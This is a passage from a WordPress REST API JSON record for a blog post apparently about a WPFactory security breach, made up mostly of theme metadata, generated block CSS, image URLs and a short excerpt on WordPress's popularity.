:22:\"uagb\/register-username\";i:0;}"],"_edit_lock":["1778190101:1"],"_thumbnail_id":["24973"],"_uag_custom_page_level_css":[""],"site-sidebar-layout":["default"],"site-content-layout":[""],"ast-site-content-layout":["default"],"site-content-style":["default"],"site-sidebar-style":["default"],"ast-global-header-display":[""],"ast-banner-title-visibility":[""],"ast-main-header-display":[""],"ast-hfb-above-header-display":[""],"ast-hfb-below-header-display":[""],"ast-hfb-mobile-header-display":[""],"site-post-title":[""],"ast-breadcrumbs-content":[""],"ast-featured-img":[""],"footer-sml-layout":[""],"ast-disable-related-posts":[""],"theme-transparent-header-meta":[""],"adv-header-id-meta":[""],"stick-header-meta":[""],"header-above-stick-meta":[""],"header-main-stick-meta":[""],"header-below-stick-meta":[""],"astra-migrate-meta-layouts":["set"],"ast-page-background-enabled":["default"],"ast-page-background-meta":["a:3:{s:7:\"desktop\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"tablet\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"mobile\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}}"],"ast-content-background-meta":["a:3:{s:7:\"desktop\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"tablet\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"mobile\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}}"],"footnotes":[""],"_elementor_edit_mode":[""],"_elementor_template_type":[""],"_elementor_data":[""],"_elementor_conditions":["a:0:{}"],"_wp_old_slug":["security-breach-at-wpfactory-170000-wordpress-sites-potentially-exposed"],"_edit_last":["1"],"_uag_css_file_name":["uag-css-24971.css"],"_uag_page_assets":["a:9:{s:3:\"css\";s:10032:\".wp-block-uagb-advanced-heading h1,.wp-block-uagb-advanced-heading h2,.wp-block-uagb-advanced-heading h3,.wp-block-uagb-advanced-heading h4,.wp-block-uagb-advanced-heading h5,.wp-block-uagb-advanced-heading h6,.wp-block-uagb-advanced-heading p,.wp-block-uagb-advanced-heading div{word-break:break-word}.wp-block-uagb-advanced-heading .uagb-heading-text{margin:0}.wp-block-uagb-advanced-heading .uagb-desc-text{margin:0}.wp-block-uagb-advanced-heading .uagb-separator{font-size:0;border-top-style:solid;display:inline-block;margin:0 0 10px 0}.wp-block-uagb-advanced-heading .uagb-highlight{color:#f78a0c;border:0;transition:all .3s ease}.uag-highlight-toolbar{border-left:0;border-top:0;border-bottom:0;border-radius:0;border-right-color:#1e1e1e}.uag-highlight-toolbar .components-button{border-radius:0;outline:none}.uag-highlight-toolbar .components-button.is-primary{color:#fff}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.uag-blocks-common-selector{z-index:var(--z-index-desktop) !important}@media(max-width: 976px){.uag-blocks-common-selector{z-index:var(--z-index-tablet) !important}}@media(max-width: 767px){.uag-blocks-common-selector{z-index:var(--z-index-mobile) !important}}.wp-block-uagb-image{display:flex}.wp-block-uagb-image__figure{position:relative;display:flex;flex-direction:column;max-width:100%;height:auto;margin:0}.wp-block-uagb-image__figure img{height:auto;display:flex;max-width:100%;transition:box-shadow .2s ease}.wp-block-uagb-image__figure>a{display:inline-block}.wp-block-uagb-image__figure figcaption{text-align:center;margin-top:.5em;margin-bottom:1em}.wp-block-uagb-image .components-placeholder.block-editor-media-placeholder .components-placeholder__instructions{align-self:center}.wp-block-uagb-image--align-left{text-align:left}.wp-block-uagb-image--align-right{text-align:right}.wp-block-uagb-image--align-center{text-align:center}.wp-block-uagb-image--align-full .wp-block-uagb-image__figure{margin-left:calc(50% - 50vw);margin-right:calc(50% - 50vw);max-width:100vw;width:100vw;height:auto}.wp-block-uagb-image--align-full .wp-block-uagb-image__figure img{height:auto;width:100% !important}.wp-block-uagb-image--align-wide .wp-block-uagb-image__figure img{height:auto;width:100%}.wp-block-uagb-image--layout-overlay__color-wrapper{position:absolute;left:0;top:0;right:0;bottom:0;opacity:.2;background:rgba(0,0,0,.5);transition:opacity .35s ease-in-out}.wp-block-uagb-image--layout-overlay-link{position:absolute;left:0;right:0;bottom:0;top:0}.wp-block-uagb-image--layout-overlay .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{opacity:1}.wp-block-uagb-image--layout-overlay__inner{position:absolute;left:15px;right:15px;bottom:15px;top:15px;display:flex;align-items:center;justify-content:center;flex-direction:column;border-color:#fff;transition:.35s ease-in-out}.wp-block-uagb-image--layout-overlay__inner.top-left,.wp-block-uagb-image--layout-overlay__inner.top-center,.wp-block-uagb-image--layout-overlay__inner.top-right{justify-content:flex-start}.wp-block-uagb-image--layout-overlay__inner.bottom-left,.wp-block-uagb-image--layout-overlay__inner.bottom-center,.wp-block-uagb-image--layout-overlay__inner.bottom-right{justify-content:flex-end}.wp-block-uagb-image--layout-overlay__inner.top-left,.wp-block-uagb-image--layout-overlay__inner.center-left,.wp-block-uagb-image--layout-overlay__inner.bottom-left{align-items:flex-start}.wp-block-uagb-image--layout-overlay__inner.top-right,.wp-block-uagb-image--layout-overlay__inner.center-right,.wp-block-uagb-image--layout-overlay__inner.bottom-right{align-items:flex-end}.wp-block-uagb-image--layout-overlay__inner .uagb-image-heading{color:#fff;transition:transform .35s,opacity .35s ease-in-out;transform:translate3d(0, 24px, 0);margin:0;line-height:1em}.wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{width:30%;border-top-width:2px;border-top-color:#fff;border-top-style:solid;margin-bottom:10px;opacity:0;transition:transform .4s,opacity .4s ease-in-out;transform:translate3d(0, 30px, 0)}.wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity:0;overflow:visible;color:#fff;transition:transform .45s,opacity .45s ease-in-out;transform:translate3d(0, 35px, 0)}.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-heading,.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-separator,.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-caption{opacity:1;transform:translate3d(0, 0, 0)}.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure img,.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure .wp-block-uagb-image--layout-overlay__color-wrapper{transform:scale(1);transition:transform .35s ease-in-out}.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure:hover img,.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{transform:scale(1.05)}.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure img,.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure .wp-block-uagb-image--layout-overlay__color-wrapper{width:calc(100% + 40px) !important;max-width:none !important;transform:translate3d(-40px, 0, 0);transition:transform .35s ease-in-out}.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure:hover img,.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{transform:translate3d(0, 0, 0)}.wp-block-uagb-image--effect-grayscale img{filter:grayscale(0%);transition:.35s ease-in-out}.wp-block-uagb-image--effect-grayscale:hover img{filter:grayscale(100%)}.wp-block-uagb-image--effect-blur img{filter:blur(0);transition:.35s ease-in-out}.wp-block-uagb-image--effect-blur:hover img{filter:blur(3px)}.uagb-block-e6f939b3.wp-block-uagb-image--layout-default figure img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure figcaption{font-style: normal;align-self: center;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay figure img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__color-wrapper{opacity: 0.2;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner{left: 15px;right: 15px;top: 15px;bottom: 15px;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-heading{font-style: normal;color: #fff;opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-heading a{color: #fff;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity: 0;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{width: 30%;border-top-width: 2px;border-top-color: #fff;opacity: 0;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-default figure:hover img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay figure:hover img{box-shadow: 0px 0px 0 #00000070;}@media only screen and (max-width: 976px) {.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}}@media only screen and (max-width: 767px) {.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}}\";s:2:\"js\";s:0:\"\";s:18:\"current_block_list\";a:18:{i:0;s:14:\"core\/paragraph\";i:1;s:12:\"core\/heading\";i:2;s:9:\"core\/html\";i:3;s:9:\"core\/list\";i:4;s:14:\"core\/list-item\";i:5;s:21:\"uagb\/advanced-heading\";i:6;s:11:\"core\/search\";i:7;s:10:\"core\/group\";i:8;s:17:\"core\/latest-posts\";i:9;s:20:\"core\/latest-comments\";i:10;s:13:\"core\/archives\";i:11;s:15:\"core\/categories\";i:12;s:10:\"uagb\/image\";i:13;s:11:\"core\/spacer\";i:14;s:30:\"woocommerce\/product-categories\";i:15;s:18:\"core\/legacy-widget\";i:16;s:10:\"core\/image\";i:17;s:14:\"core\/shortcode\";}s:8:\"uag_flag\";b:1;s:11:\"uag_version\";s:10:\"1778451505\";s:6:\"gfonts\";a:0:{}s:10:\"gfonts_url\";s:0:\"\";s:12:\"gfonts_files\";a:0:{}s:14:\"uag_faq_layout\";b:0;}"]},"uagb_featured_image_src":{"full":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach.jpg",2000,1000,false],"thumbnail":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-150x150.jpg",150,150,true],"medium":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-300x150.jpg",300,150,true],"medium_large":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-768x384.jpg",768,384,true],"large":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-1024x512.jpg",1024,512,true],"1536x1536":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-1536x768.jpg",1536,768,true],"2048x2048":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach.jpg",2000,1000,false],"trp-custom-language-flag":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-18x9.jpg",18,9,true]},"uagb_author_info":{"display_name":"admin","author_link":"https:\/\/www.ferberenterprises.com\/ch-de\/author\/admin2721\/"},"uagb_comment_info":0,"uagb_excerpt":"WordPress remains the most widely used content management system in the world, powering more than 40 percents of all websites on the internet. From small business websites and personal blogs to large enterprise platforms and e-commerce infrastructures, the CMS has become the backbone of the modern web. Its popularity stems from its flexibility, open ecosystem,&hellip;","_links":{"self":[{"href":"https:\/\/www.ferberenterprises.com\/ch-de\/wp-json\/wp\/v2\/posts\/24971","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ferberenterprises.com\/ch-de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ferberenterprises.com\/ch-de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/ch-de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/ch-de\/wp-json\/wp\/v2\/comments?post=24971"}],"version-history":[{"count":20,"href":"https:\/\/www.ferberenterprises.com\/ch-de\/wp-json\/wp\/v2\/posts\/24971\/revisions"}],"predecessor-version":[{"id":25042,"href":"https:\/\/www.ferberenterprises.com\/ch-de\/wp-json\/wp\/v2\/posts\/24971\/revisions\/25042"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/ch-de\/wp-json\/wp\/v2\/media\/24973"}],"wp:attachment":[{"href":"https:\/\/www.ferberenterprises.com\/ch-de\/wp-json\/wp\/v2\/media?parent=24971"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/ch-de\/wp-json\/wp\/v2\/categories?post=24971"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/ch-de\/wp-json\/wp\/v2\/tags?post=24971"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}